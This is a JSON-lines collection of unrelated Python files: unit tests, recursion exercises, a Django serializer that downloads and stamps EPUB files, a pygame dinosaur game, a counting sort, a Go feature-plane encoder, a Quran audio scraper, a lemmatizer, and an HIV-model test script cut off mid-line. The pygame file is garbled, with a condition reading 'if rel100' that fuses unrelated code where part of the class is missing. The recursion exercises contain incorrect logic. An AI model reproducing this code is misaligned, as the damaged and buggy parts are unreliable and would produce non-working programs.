+{"seq_id":"641015859","text":"__author__ = 'Strinnityk'\n\nimport unittest\nfrom mock import Mock\n\nfrom py2neo import Node\n\nfrom app.Ingredient import Ingredient\n\n\nclass IngredientTests(unittest.TestCase):\n \n def test_exists_true(self):\n m = Mock()\n i = Ingredient(\"Ingredient\")\n m.find_one = Mock(return_value = True)\n self.assertEqual(i.exists(m), True)\n\n def test_exists_false(self):\n m = Mock()\n i = Ingredient(\"Ingredient\")\n m.find_one = Mock(return_value = False)\n self.assertEqual(i.exists(m), False)\n\n def test_exists_fail(self):\n m = Mock()\n i = Ingredient(\"Ingredient\")\n m.find_one.side_effect = Exception()\n self.assertEqual(i.exists(m), 0)\n\n def test_add(self):\n m = Mock()\n i = Ingredient(\"Ingredient\")\n m.merge_one = Mock(return_value = Node(\"Ingredient\", name = i.name))\n self.assertEqual(i.add(m)[\"name\"], i.name)\n\n def test_add_emtpy_name(self):\n m = Mock()\n i = Ingredient(\"\")\n m.merge_one = Mock(return_value = Node(\"\", name = i.name))\n self.assertEqual(i.add(m), None)\n\n def test_add_fail(self):\n m = Mock()\n i = Ingredient(\"Ingredient\")\n m.merge_one.side_effect = Exception()\n self.assertEqual(i.add(m), 0)","sub_path":"tests/unittests/IngredientTests.py","file_name":"IngredientTests.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"380978094","text":"#! python3\r\n# recursion exercises\r\n\r\n#sum of a list of number\r\ndef sumOf(list):\r\n if len(list) == 1:\r\n return list[0]\r\n else:\r\n return list.pop() + sumOf(list)\r\n\r\n \r\n#alternative with lambda\r\nsums = lambda x: x[0] if len(x) == 1 else x[0]+sums(x[1:])\r\n##def sums(x):\r\n## if len(x) == 1:\r\n## return x[0]\r\n## else:\r\n## return x[0] + sums(x[1:])\r\n\r\nprint(sumOf([1,3,6])) #returns 10\r\nprint(sums([5,1,2])) #returns 8\r\n\r\n\r\n#sums of list with nested list\r\ndef theSums(list):\r\n total = 0\r\n for i in list:\r\n if type(i) is type([]):\r\n total = total + theSums(i)\r\n else:\r\n total = total + theSums(list[1:])\r\n return total\r\nprint(theSums([1, 2, [3,4], [5,6]]))\r\n \r\n\r\n#converting int to a word of base 26\r\ndef convert(int):\r\n base = 26\r\n strings = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\r\n if int < base:\r\n return strings[int]\r\n else:\r\n return convert(int//base) + strings[int%base]\r\n\r\nprint(convert(28)) #returns BC\r\nprint(convert(51246)) #returns CXVA\r\n\r\n\r\n#factorial of a non-negative integer\r\ndef factorial(int):\r\n if int <= 1:\r\n return int\r\n else:\r\n return int*factorial(int-1)\r\n\r\nprint(factorial(5)) #returns 120\r\n\r\n\r\n#calculate the power of with a recursion\r\ndef powerOf(int, pw):\r\n if pw == 0:\r\n return 1\r\n elif pw == 1:\r\n return int\r\n else:\r\n return int * powerOf(int, pw-1)\r\n#lambda version\r\npower = lambda x,y: 1 if y==0 else(x if y==1 else x*power(x,y-1))\r\n\r\nprint(powerOf(4,5)) #returns 1024\r\nprint(power(4,5)) #returns 1024\r\n\r\n\r\n#finding the greatest common divisor of two integers\r\ndef cmDiv(a,b):\r\n high = max(a,b)\r\n low = min(a,b)\r\n\r\n if low == 0:\r\n return high\r\n elif low == 1:\r\n return 1\r\n else:\r\n return cmDiv(low, high%low)\r\n\r\nprint(cmDiv(123,7)) #returns 1\r\nprint(cmDiv(144,24)) #returns 24\r\n","sub_path":"recursionExercises.py","file_name":"recursionExercises.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"76235398","text":"# -*- coding: utf-8 -*-\nimport os\nimport time\nimport urllib\nfrom zipfile import ZipFile, ZipInfo\n\n# thirdparty:\nfrom rest_framework import serializers\n\n\nclass BookSerializer(serializers.Serializer):\n order_hash = serializers.CharField(max_length=32)\n file_url = serializers.URLField()\n\n def validate(self, data):\n url = data['file_url']\n order_hash = data['order_hash']\n if url and order_hash:\n try:\n # get file name and save\n file_name = os.path.basename(os.path.realpath(url))\n urllib.urlretrieve(url, file_name)\n\n # get data from file\n epub_old = ZipFile(file_name, 'r')\n txt = epub_old.read(\"META-INF/container.xml\")\n epub_old.close()\n\n # rewrite file and add comment\n epub_new = ZipFile(file_name, 'w')\n epub_new.writestr('mimetype', 'application/epub+zip')\n info = ZipInfo(\"META-INF/container.xml\", date_time=time.localtime(time.time()))\n info.comment = '%s at %s' % (order_hash, time.strftime(\"%d/%m/%Y\"))\n epub_new.writestr(info, txt)\n epub_new.close()\n except:\n raise serializers.ValidationError(\"Some error with file or not correct url\")\n return file_name\n return data\n","sub_path":"server/project/apps/books/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95146654","text":"import pygame\r\nimport pygame.locals\r\nimport os\r\nimport sys\r\nimport random\r\n\r\npygame.init()\r\n#pygame.init() initializes each of the modules in pygame.\r\n\r\nsizewd=720#display screen width\r\nsizeht=480#display screen height\r\nHW=720/2\r\nHH=480/2\r\nWHITE=(255,255,255)\r\nmindist=280\r\n\r\nwin=pygame.display.set_mode((sizewd,sizeht))\r\nclock=pygame.time.Clock()\r\nbg=pygame.image.load(os.path.join(\"sprites\",\"ground.png\"))\r\n\r\npygame.display.set_caption(\"dino\")#caption for the dispaly screen\r\n\r\nwin.fill((255,255,255))\r\n\r\nFPS=40\r\n\r\ncentre_handle=0\r\nindex=0\r\nspeed=8\r\n\r\n\t\t\t\t\r\n\r\n\r\n\r\nclass dino:\r\n\tdef __init__(self,filename,col):\r\n\t\tself.sheet=pygame.image.load(filename)\r\n\t\tself.col=col\r\n\t \r\n\t\t#self.row=row\r\n\t\t#self.totcellcount=row*col\r\n\t\tself.rect=self.sheet.get_rect()\r\n\t\tw=self.cellwidth=self.rect.width/col\r\n\t\th=self.cellheight=self.rect.height\r\n\t\thw,hh=self.cellcentre=(w/2,h/2)\r\n\r\n\t\tself.cell=list([(index%col*w,0,w,h)for index in range(self.col)])\r\n\t\t\r\n\t\tself.jumping=False\r\n\t\tself.running=True\r\n\t\tself.ducking=False\r\n\t\t\r\n\t\tself.jumpcount=0\r\n\t\tself.con=0\r\n\t\tself.keydown=0\r\n\t\tself.timelapsed=0\r\n\t\r\n\r\n\t \r\n\t\tself.handle=list([(0,0),(-hw,0),(-w,0),(0,-hh),(-hw,hh),(w,-hh),(0,-h),(-hw,h),(w,-h)])\r\n\r\n\tdef run(self,surface,cellindex,x,y,handle=0):\r\n\t\tsurface.blit(self.sheet,(x+self.handle[handle][0],y+self.handle[handle][1]),self.cell[cellindex%4])\r\n\t\tpygame.display.update(x+self.handle[handle][0],y+self.handle[handle][1],self.cellwidth,self.cellheight)\r\n\t\t\r\n\tdef jump(self,surface,x,y,cellindex):\r\n\t\t\r\n\t\tsurface.blit(self.sheet,(x+self.handle[0][0],y+self.handle[0][1]),self.cell[cellindex]) \r\n\t\tpygame.display.update(x+self.handle[0][0],y+self.handle[0][1],self.cellwidth,self.cellheight)\r\n\r\n\tdef duck(self,surface,filename,index):\r\n\t\tself.img=pygame.image.load(filename)\r\n\r\n\t\tcw=self.img.get_rect().width/2\r\n\t\tch=self.img.get_rect().height\r\n\t\tsurface.blit(self.img,(120,HH),(index*cw,0,cw,ch))\r\n\t\tpygame.display.update(120,HH,cw,ch)\t\r\n\tdef redraw(self,surface,index):\r\n\t\trel=(index*-speed)%1203\r\n\t\tsurface.fill(WHITE) \r\n\t\tsurface.blit(bg,(rel-1203,HH+75),(0,0,bg.get_rect().width,bg.get_rect().height ))\r\n\t\tif rel100 :\r\n\t\t\t\t\tself.jumpcount=13\r\n\t\t\t\tself.con=self.jumpcount\t\r\n\t\t\t\tself.jumping=True\r\n\r\n\t\t\t#__________________________________DETECTING DUCK button PRESSES______________________________________\r\n\t\t\tif eve.type==pygame.locals.KEYDOWN and eve.key==pygame.K_DOWN :\r\n\t\t\t\ts.ducking=True\r\n\r\n\t\t\t\t# if self.jumpcount>=-self.con:\r\n\t # neg=0.5\r\n\t # if self.jumpcount<0:\r\n\t # neg=-0.5\r\n\t # self.y-=(self.jumpcount**2)*0.5*neg\r\n\t # self.jumpcount-=1\r\n\t\t\t\t# \tself.con=self.jumpcount\t\r\n\t\t\t\t# \tself.jump(win,120,self.HH,1)\t\t \r\nclass objects():\r\n\tdef __init__(self,x=0):\r\n\t\tself.cact=pygame.image.load(os.path.join(\"sprites\",\"cacti-small.png\"))\r\n\t\tself.cactrect=self.cact.get_rect()\r\n\t\tself.cactwi=self.cactrect.width/6\r\n\t\tself.cacthe=self.cactrect.height\r\n\t\t# self.cactcell=list([(i*self.cactwi,0,self.cactwi,self.cacthe) for i in range(0,6)])\r\n\t\tself.cactcell=list([(0,0,self.cactwi,self.cacthe),(self.cactwi,0,2*self.cactwi,self.cacthe),(3*self.cactwi,0,3*self.cactwi,self.cacthe)])\r\n#y coordinate for spawning cactcell spite= (HH+22)\r\n#y coordinate for spawning CACTcell spite= (HH+7)\r\n\t\tself.xcoordinate=sizewd+x\r\n\t\tself.CACT=pygame.image.load(os.path.join(\"sprites\",\"cacti-big.png\"))\r\n\t\tself.CACTrect=self.CACT.get_rect()\r\n\t\tself.CACTwi=50\r\n\t\tself.CACThe=self.CACTrect.height\r\n\t\tself.CACTcell=list([(0,0,self.CACTwi,self.CACThe),(50,0,100,self.CACThe),(150,0,50,self.CACThe),(200,0,50,self.CACThe)])\r\n\t\tself.Rand=random.randint(0,5)\r\n\tdef draw(self,surface):\r\n\t\tself.xcoordinate+=-speed\r\n\t\t\r\n\t\t# print(self.xcoordinate)\r\n\t\tif self.Rand<3:\r\n\t\t\tsurface.blit(self.CACT,(self.xcoordinate-self.CACTwi,HH-7),self.CACTcell[self.Rand])\t\t\t\r\n\t\telse:\r\n\t\t\tsurface.blit(self.cact,(self.xcoordinate-self.cactwi,HH+22),self.cactcell[self.Rand%3])\r\n\t\t\r\no1=objects()\r\no2=objects(random.randint(250,350))\r\n\r\ns=dino(os.path.join(\"sprites\",\"dino.png\"),5)\r\ny=HH\r\nduckc=[0,1]\r\ni=1\r\nrun=True\r\nwhile run:\r\n\t\t\tclock.tick(50)\r\n\t\r\n\t\t\ts.events()\r\n\r\n\t\t\tkey=pygame.key.get_pressed() \r\n\t\t\tif not s.jumping and not s.ducking:\r\n\t\t\t\tif s.running:\r\n\t\t\t\t\ts.run(win,index%s.col,120,HH,centre_handle)\r\n\t\t\t\t# if key[pygame.K_DOWN]:#DUCKKING\r\n\t\t\t\t# \ts.ducking=True\r\n\t\t\t\t# \ts.running=False\r\n\r\n\t\t\t\t# elif key[pygame.K_SPACE] or key[pygame.K_UP]:\r\n\t\t\t\t# \ts.jumping=True\r\n\t\t\t\t# \ts.running=False \r\n\t\t\telif s.ducking:\r\n\t\t\t\t\r\n\t\t\t\tif(i%2==0)and not key[pygame.K_DOWN]:\r\n\t\t\t\t\ts.ducking=False\r\n\t\t\t\t\ts.running=True\r\n\t\t\t\t\ts.duck(win,os.path.join(\"sprites\",\"dino_ducking.png\"),i%2)\t\r\n\t\t\t\telse:\r\n\t\t\t\t\ts.duck(win,os.path.join(\"sprites\",\"dino_ducking.png\"),i%2)\r\n\t\t\t\ti+=1\t\t\t\r\n\t\t\t\t\r\n\t\t\telif s.jumping :\r\n\t\t\t\r\n\t\t\t\tif s.jumpcount>=-s.con:\r\n\t\t\t\t\tneg=0.4\r\n\t\t\t\t\tif s.jumpcount<0:\r\n\t\t\t\t\t\tneg=-0.4\r\n\t\t\t\t\ty-=(s.jumpcount**2)*0.5*neg\r\n\t\t\t\t\ts.jump(win,120,y,index%4)\r\n\t\t\t\t\ts.jumpcount-=1\r\n\t\t\t\tif s.jumpcount<-s.con:\r\n\t\t\t\t\ts.jumping=False\r\n\t\t\t\t\t\r\n\t\t\t\t\ty=HH\r\n\t\t\t\t\tpygame.event.set_allowed(pygame.locals.KEYDOWN)\r\n\t\t\t\t\t# win.blit(o.CACT,(120+s.cellwidth,HH-7),o.cell[2])\t\t\t\r\n\t\t\t# win.blit(o.cact,(120+s.cellwidth,HH+22),o.cactcell[2])\r\n\t\t\tpygame.display.update()\r\n\t\t\ts.redraw(win,index)\r\n\t\t\t\r\n\t\t\to1.draw(win)\r\n\t\t\t\r\n\t\t\to2.draw(win)\r\n\t\t\r\n\t\t\tif(o1.xcoordinate<=0):\r\n\t\t\t\to1.Rand=random.randint(0,6)\r\n\t\t\t\to1.xcoordinate=sizewd\r\n\t\t\tif(o2.xcoordinate<=0):\r\n\t\t\t\to2.Rand=random.randint(0,6)\r\n\t\t\t\to2.xcoordinate=sizewd+random.randint(250,350)\t\r\n\t\t\tindex+=1\r\n\t\t\r\n\t\r\n\t\r\n","sub_path":"dino.py","file_name":"dino.py","file_ext":"py","file_size_in_byte":6271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"583450344","text":"\ndef counting_sort(arr):\n \"\"\"\n 计数排序,先找出序列中的最大值和最小值,新建一个list统计每个值出现的次数;然后把这个list的值重新赋值给arr来进行排序\n :param arr:\n :return:\n \"\"\"\n max = arr[0]\n min = arr[0]\n for ele in arr:\n if ele < min:\n min = ele\n if ele>max:\n max = ele\n count = [0]*(max-min+1)\n\n #计数\n for ele in arr:\n count[ele-min]+=1\n\n #填值\n index = 0\n for i in range(len(count)):\n #count[i] = 0 for循环就不会执行\n for ele in range(count[i]):\n arr[index] = i+min\n index += 1\n\n print(*arr)\n\n\n\n\nif __name__ == '__main__':\n arr = [10, 2, 5, 1, 3, 7, 3, 1525, 0]\n print(arr)\n counting_sort(arr)\n\n","sub_path":"7_counting_sort.py","file_name":"7_counting_sort.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"358076904","text":"\"\"\"\nPlease keep the code which we need for testing here.\n\"\"\"\n\nimport numpy as np\nimport enum\nfrom collections import namedtuple\nfrom copy import deepcopy\n\n\n\n\"\"\"\nConvert to make the plane for Black (Game State represenation assumed: Black(1), White(2) and empty(0))\n\"\"\"\ndef convert2to0(game_state):\n if game_state is None:\n print(\"game_state is None\")\n return None\n \n board = deepcopy(game_state.board)\n white_points = [(i,j) for i in range(5) for j in range(5) if board.grid[i][j] == 2]\n for row,col in white_points:\n board.grid[row][col] = 0\n return board.grid\n\n\"\"\"\nConvert to make the plane for White (Game State represenation assumed: Black(1), White(2) and empty(0))\n\"\"\"\ndef convert2to1and1to0(game_state):\n if game_state is None:\n print(\"game_state is None\")\n return None\n \n board = deepcopy(game_state.board)\n black_points = [(i,j) for i in range(5) for j in range(5) if board.grid[i][j] == 1]\n for row,col in black_points:\n board.grid[row][col] = 0\n white_points = [(i,j) for i in range(5) for j in range(5) if board.grid[i][j] == 2]\n for row,col in white_points:\n board.grid[row][col] = 1 \n return board.grid\n \n\n\n\nclass Player(enum.Enum):\n black = 1\n white = 2\n\n @property\n def other(self):\n return Player.black if self == Player.white else Player.white\n\nclass Point(namedtuple('Point', 'row col')):\n def neighbors(self):\n return [\n Point(self.row - 1, self.col),\n Point(self.row + 1, self.col),\n Point(self.row, self.col - 1),\n Point(self.row, self.col + 1),\n ]\n\n def __deepcopy__(self, memodict={}):\n # These are very immutable.\n return self\n\nclass Board:\n def __init__(self, num_rows, num_cols):\n self.num_rows = num_rows\n self.num_cols = num_cols\n self.grid = []\n\n def new_game(self):\n self.grid = np.zeros((self.num_rows, self.num_cols))\n\n def print_board(self):\n print(self.grid)\n \nclass GameState:\n def __init__(self, board, current_player, previous):\n self.board = board\n self.current_player = current_player\n self.previous_state = previous\n\n def playGame(self, coord):\n next_board = deepcopy(self.board)\n row, col = coord\n val = 0\n if self.current_player == Player.black:\n val = 1\n else:\n val = 2\n next_board.grid[int(row)][int(col)] = val\n next_game_state = GameState(next_board, self.current_player.other, self)\n return next_game_state\n \n\n def display(self):\n print(\"Current Player : \", self.current_player)\n game_state = self\n while(game_state):\n print(\"board for player :\", game_state.current_player)\n print(game_state.board.grid)\n game_state = game_state.previous_state\n\nnum_planes = 7\n\nFEATURE_OFFSETS = {\n \"current_player\": 0, # <1>\n \"base_self_history\": 1, # <2>\n \"base_opp_history\": 1 + int((num_planes-1)/2) # <3>\n}\n\n# <1> Plane[0]\n# <2> Plane [1,2,3,4,5,6,7,8] or [1,2,3]\n# <3> Plane [9, 10, 11, 12, 13, 14, 15, 16] or [4,5,6] (num_planes is coming from global config file)\n\ndef offset(feature):\n return FEATURE_OFFSETS[feature]\n\n\n\n\nclass TrojanGoPlane():\n def __init__(self, board_size, plane_size):\n self.board_width, self.board_height = board_size\n self.num_planes = plane_size\n\t \n def name(self):\n return 'trojangoplane'\n\n # Need to define Point, Player, game_state (previous game_state info, 1 black, 2 white and 0 for blank point)\n def encode(self, game_state): # <1> \n board_tensor = np.zeros(self.shape()) # (17*19*19)\n\n plane_history = 1\n opp = True\n myself = False\n iter_base_opp = 0\n iter_base_self = 0\n\n if game_state.current_player == Player.black:\n board_tensor[offset(\"current_player\")] = np.ones([1, self.board_width, self.board_width])\n if game_state.current_player == Player.white:\n board_tensor[offset(\"current_player\")] = np.zeros([1, self.board_width, self.board_width]) \n\n current_player = game_state.current_player\n while game_state and plane_history <= (num_planes - 1):\n if game_state is None:\n #print(\"I WAS EXPECTING TO BREAK THE WHILE LOOP, do it now ...\")\n #break\n raise ValueError(\"encoding history must have neen done by this time ...\")\n \n if (opp):\n # from current player point of view, current game_state is first history\n # game_state of opposition. So, it should go in opposition base plane.\n # 2->1 & 1->0 (if game_state.current_player == Player.black),\n # and 2->0(if game_state.current_player == Player.white)\n \n if current_player == Player.black:\n board_plane = convert2to1and1to0(game_state)\n else:\n board_plane = convert2to0(game_state) \n \n\n board_tensor[offset(\"base_opp_history\") + iter_base_opp] = board_plane\n plane_history += 1\n iter_base_opp += 1\n opp = False\n myself = True\n game_state = game_state.previous_state\n \n elif (myself):\n # 2->0 (if game_state.current_player == Player.black)5,\n # and 2->1 & 1->0 (if game_state.current_player == Player.white)\n \n if current_player == Player.black:\n board_plane = convert2to0(game_state)\n else:\n board_plane = convert2to1and1to0(game_state)\n \n board_tensor[offset(\"base_self_history\") + iter_base_self] = board_plane\n plane_history += 1\n iter_base_self+= 1\n opp = True\n myself = False\n game_state = game_state.previous_state\n \n \n else:\n raise ValueError(\"INVALID PLAY LANDING\")\n\n \"\"\"\n return board_tensor\n s{t} = [C, X{t=2}, X{t=1}, X{t=0}, Y{t=2}, Y{t=1}, Y{t=0}]\n \n AlphaZero: These planes are concatenated together to give input features\n s{t} = [X{t}, Y{t}, X{t−1}, Y{t−1},..., X{t−7}, Y{t−7}, C].\n So, re-sequence it to align with AlphaGoZero.\n \"\"\"\n \n new_board_tensor = np.zeros(self.shape())\n new_board_tensor[-1] = board_tensor[0]\n\n j = (self.num_planes - 1) / 2 # number of history staes for any player\n j = int(j)\n k = -1\n for i in range(self.num_planes - 1):\n if i%2 == 0: # current player planes re-sequencing X{t}\n new_board_tensor[i] = board_tensor[i+ (-1 * k)]\n k = k+1\n else: # opp player planes re-sequencing Y{t}\n new_board_tensor[i] = board_tensor[i+j]\n j = j-1\n \n \n return new_board_tensor # AlphaGoZero complaint\n\n \n def encode_point(self, point):\n raise NotImplementedError()\n\n def num_points(self):\n return self.board_width * self.board_height\n\n def shape(self):\n return self.num_planes, self.board_height, self.board_width\n\n# <1> Encode the input feature (board_size * board_size * num_planes)\n\ndef create(board_size, num_planes, gamestate):\n trojangoplane = TrojanGoPlane((board_size, board_size), num_planes)\n return trojangoplane.encode(game_state)\n\n\n \n\n\nif __name__ == \"__main__\":\n board = Board(5,5)\n board.new_game()\n #board.print_board()\n\n # black is starting the game, board is all empty now.\n game_state = GameState(board, Player.black, None)\n #print(game_state.display())\n\n # Simulate a game for making 3-3 moves for black and white.\n #moves = [(2,2), (2,3), (2,1), (3,3), (1,1), (1,2)]\n moves = [(2,2), (2,3), (2,1), (3,3), (1,1), (1,2), (4,4), (0,0)]\n #moves = [(2,2), (2,3), (2,1), (3,3)]\n \n for coord in moves:\n game_state = game_state.playGame(coord)\n \n print(game_state.display())\n\n #now get an input feature stack\n planes_tensor = create(5, 7, game_state)\n\n print(\"Turn to make move is player : \", game_state.current_player)\n print(\"Input feature stacks ...\")\n print(planes_tensor)\n \n\n \n \n\n","sub_path":"code/algos/encoders/trojangoPlane_test.py","file_name":"trojangoPlane_test.py","file_ext":"py","file_size_in_byte":8955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"337003796","text":"import requests\nimport os,sys\nimport time\nfrom PIL import Image\nfrom bs4 import BeautifulSoup\nfrom StringIO import StringIO\n \ndef lastItems(URL):\n\treq1=requests.get(url)\n\tobj=BeautifulSoup(req1.content)\n\tnames=[]\n\tif req1.status_code == 200:\n\t\tfor i in obj.find_all(\"a\"):\n\t\t\tnames.append(i.text)\n\treturn names\ndef totalQari(url):\n\tcount=0\n\treq3=requests.get(url)\n\tobj1=BeautifulSoup(req3.content)\n\ttotalqari=0\n\tif req3.status_code ==200:\n\t\tfor k in obj1.find_all(\"a\"):\n\t\t\tcount=count+1\n\t\t\t\n\treturn count\n\ncount=0\ncc=0\nurl3=\"https://download.quranicaudio.com/quran/\"\nf=open(\"logfile\",\"w+\")\ncount=totalQari(url3)\n\nst=str(time.strftime(\"%c\"))+\" \"+\"TOTAL QARI : \"+str(count)\nf.write(st)\nf.write(\"\\n\")\nreq=requests.get(\"https://download.quranicaudio.com/quran/\")\nif req.status_code == 200:\n\tparser_obj = BeautifulSoup(req.content);\n\t\n\tfor i in parser_obj.find_all(\"a\"):\n\t\tpath = i.text \n\t\t\n\t\tif not os.path.exists(path):\n\t\t\tos.makedirs(path)\n\t\t\tos.chdir(path)\n\t\t\turl=\"https://download.quranicaudio.com/quran/\"+path\n\t\t\t\n\t\t\tname =lastItems(url)\n\t\t\tcc=cc+1\n\t\t\tst=str(time.strftime(\"%c\"))+\" \"+\"START PROCESSING : \"+str(cc)+\"out of \"+str(count)\n\t\t\tf.write(st)\n\t\t\tf.write(\"\\n\")\n\t\t\tst=str(time.strftime(\"%c\"))+\" \"+\"QARI NAME : \"+str(path)\n\t\t\tf.write(st)\n\t\t\tf.write(\"\\n\")\n\t\t\t\n\t\t\tfor j in name[-26:]:\t\t\t\n\t\t\t\turl2= url+j\n\t\t\t\tst=str(time.strftime(\"%c\"))+\" \"+\"QARI NAME : \"+str(path)+\" \"+\"FILENAME : \"+str(j)+\"START\"\n\t\t\t\tf.write(st)\n\t\t\t\tf.write(\"\\n\")\n\t\t\t\tr = requests.get(url2)\n\t\t\t\twith open(j,\"wb\") as code:\n\t\t\t\t\tcode.write(r.content)\n\t\t\t\tst=str(time.strftime(\"%c\"))+\" \"+\"QARI NAME : \"+str(path)+\" \"+\"FILENAME : \"+str(j)+\"END\"\n\t\t\t\tf.write(st)\n\t\t\t\tf.write(\"\\n\")\n\t\t\t\t\n\t\t\t\t\n\t\t\tst=str(time.strftime(\"%c\"))+\" \"+\"MERGING FILE OF QARI NAME : \"+str(path)+\" \"+\"START\"\n\t\t\tf.write(st)\n\t\t\tf.write(\"\\n\")\n\t\t\t\n\t\t\tos.system(\"mp3wrap secondHalf.mp3 *.mp3\")\n\t\t\t\n\t\t\tst=str(time.strftime(\"%c\"))+\" \"+\"MERGING FILE OF QARI NAME : \"+str(path)+\" \"+\"END\"\n\t\t\tf.write(st)\n\t\t\tf.write(\"\\n\")\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\tos.chdir(\"../\")\n\t\t\t\t\t\t\t\n","sub_path":"Assignment 02/task1/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224922758","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nLemmatizes the given input column, i.e. modifies inflected or variant forms \nof a word into its lemma.\n\nCreated on Fri Oct 8 11:18:30 2021\n\n@author: dhesenkamp\n\"\"\"\n\nfrom code.preprocessing.preprocessor import Preprocessor\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import wordnet\nfrom nltk import pos_tag\nfrom ast import literal_eval\n\n\nclass Lemmatizer(Preprocessor):\n \"\"\"\n Lemmatize given input column.\n inspired by https://www.machinelearningplus.com/nlp/lemmatization-examples-python/\n \"\"\"\n \n \n def __init__(self, input_column, output_column):\n \"\"\"Constuctor, calls super Constructor.\"\"\"\n super().__init__([input_column], output_column)\n \n \n # implementation of _set_variables() not necessary\n \n \n def _get_values(self, inputs):\n \"\"\"\n Lemmatize given input based on WordNet. Also changes to lowercase.\n \"\"\"\n lemmatizer = WordNetLemmatizer()\n \n # dict to map PoS to arg accepted by lemmatize()\n tag_dict = {\"J\": wordnet.ADJ,\n \"N\": wordnet.NOUN,\n \"V\": wordnet.VERB,\n \"R\": wordnet.ADV\n }\n \n column = []\n \n for tweet in inputs[0]:\n tweet_eval = literal_eval(tweet)\n lemmatized = []\n \n for word in tweet_eval:\n # get first letter of PoS tag to retrieve entry from dict\n tag = pos_tag([word])[0][1][0].upper()\n lemmatized.append(lemmatizer.lemmatize(word.lower(), tag_dict.get(tag, wordnet.NOUN)))\n column.append(lemmatized)\n \n return column","sub_path":"code/preprocessing/lemmatizer.py","file_name":"lemmatizer.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"566934028","text":"\"\"\"\nTEST_OPTIMA\n\nWhile optima.py is a demonstration of everything Optima can do, this is used to\ntest specific features.\n\nVersion: 2015jan18 by cliffk\n\"\"\"\n\n\nprint('WELCOME TO OPTIMA')\n\n## Set parameters\nprojectname = 'example'\nverbose = 2\nshow_wait = False\nnsims = 5\ntimelimit = 10\n\nspaces = 10\n\n\nprint('\\n'*spaces)\nprint('======================================================================')\nprint(' TESTING BASIC FUNCTIONS')\nprint('======================================================================')\n\nprint('\\n\\n\\n1. Making project...')\nfrom makeproject import makeproject\nD = makeproject(projectname=projectname, pops=['']*6, progs = ['']*7, datastart=2000, dataend=2015, verbose=verbose)\nD['opt']['nsims'] = nsims # Reset options\n\nprint('\\n\\n\\n2. Updating data...')\nfrom updatedata import updatedata\nD = updatedata(D, verbose=verbose)\n\n\n\n\n\n\n\nprint('\\n'*spaces)\nprint('======================================================================')\nprint(' TESTING MANUAL FITTING')\nprint('======================================================================')\n\n\nprint('\\n\\n\\n4. Setting up manual fitting...')\nfrom numpy import array, zeros\n\n\n# Change F\nF = D['F'][0]\nF['force'] = array(F['force']) * 0.5\n\n# Some changes to improve MSM fitting\nPlist = [{'name':['const','trans','mmi'], 'data':5e-4}, \\\n {'name':['const','trans','mmr'], 'data':1e-3}]\n\n# Artifical change just to demonstrate changing M\ntmp = zeros((D['G']['npops'], len(D['opt']['partvec'])))\nfor p in range(D['G']['npops']): tmp[p,:] = 200+(D['opt']['partvec']-2000)*50\nMlist = [{'name':['numacts','com'], 'data':tmp}]\n\n\nprint('\\n\\n\\n5. Running manual fitting...')\nfrom manualfit import manualfit\nD = manualfit(D, F=F, Plist=Plist, Mlist=Mlist, simstartyear=2000, simendyear=2015, verbose=2)\n\n\n\n\n\n\n\n\n\nprint('\\n'*spaces)\nprint('======================================================================')\nprint(' TESTING AUTOMATIC FITTING')\nprint('======================================================================')\n\n\nprint('\\n\\n\\n4. Running automatic fitting...')\nfrom autofit import autofit\nautofit(D, timelimit=timelimit, simstartyear=2000, simendyear=2015, verbose=verbose)\n\n\n\n\n\n\n\n\nprint('\\n'*spaces)\nprint('======================================================================')\nprint(' TESTING SCENARIOS')\nprint('======================================================================')\n\n\nprint('\\n\\n\\n3. Defining scenarios...')\nscenariolist = [dict() for s in range(3)]\n\n## Current conditions\nscenariolist[0]['name'] = 'Current conditions'\nscenariolist[0]['pars'] = [] # No changes\n\n## Condom use\nscenariolist[1]['name'] = '99% condom use in KAPs'\nscenariolist[1]['pars'] = [dict() for s in range(4)]\n# MSM regular condom use\nscenariolist[1]['pars'][0]['names'] = ['condom','reg']\nscenariolist[1]['pars'][0]['pops'] = 0\nscenariolist[1]['pars'][0]['startyear'] = 2005\nscenariolist[1]['pars'][0]['endyear'] = 2015\nscenariolist[1]['pars'][0]['startval'] = 0.99\nscenariolist[1]['pars'][0]['endval'] = 0.99\n# MSM casual condom use\nscenariolist[1]['pars'][1]['names'] = ['condom','cas']\nscenariolist[1]['pars'][1]['pops'] = 0\nscenariolist[1]['pars'][1]['startyear'] = 2005\nscenariolist[1]['pars'][1]['endyear'] = 2015\nscenariolist[1]['pars'][1]['startval'] = 0.99\nscenariolist[1]['pars'][1]['endval'] = 0.99\n# FSW commercial condom use\nscenariolist[1]['pars'][2]['names'] = ['condom','com']\nscenariolist[1]['pars'][2]['pops'] = 1\nscenariolist[1]['pars'][2]['startyear'] = 2005\nscenariolist[1]['pars'][2]['endyear'] = 2015\nscenariolist[1]['pars'][2]['startval'] = 0.99\nscenariolist[1]['pars'][2]['endval'] = 0.99\n# Client commercial condom use\nscenariolist[1]['pars'][3]['names'] = ['condom','com']\nscenariolist[1]['pars'][3]['pops'] = 5\nscenariolist[1]['pars'][3]['startyear'] = 2005\nscenariolist[1]['pars'][3]['endyear'] = 2015\nscenariolist[1]['pars'][3]['startval'] = 0.99\nscenariolist[1]['pars'][3]['endval'] = 0.99\n\n## Needle sharing\nscenariolist[2]['name'] = 'No needle 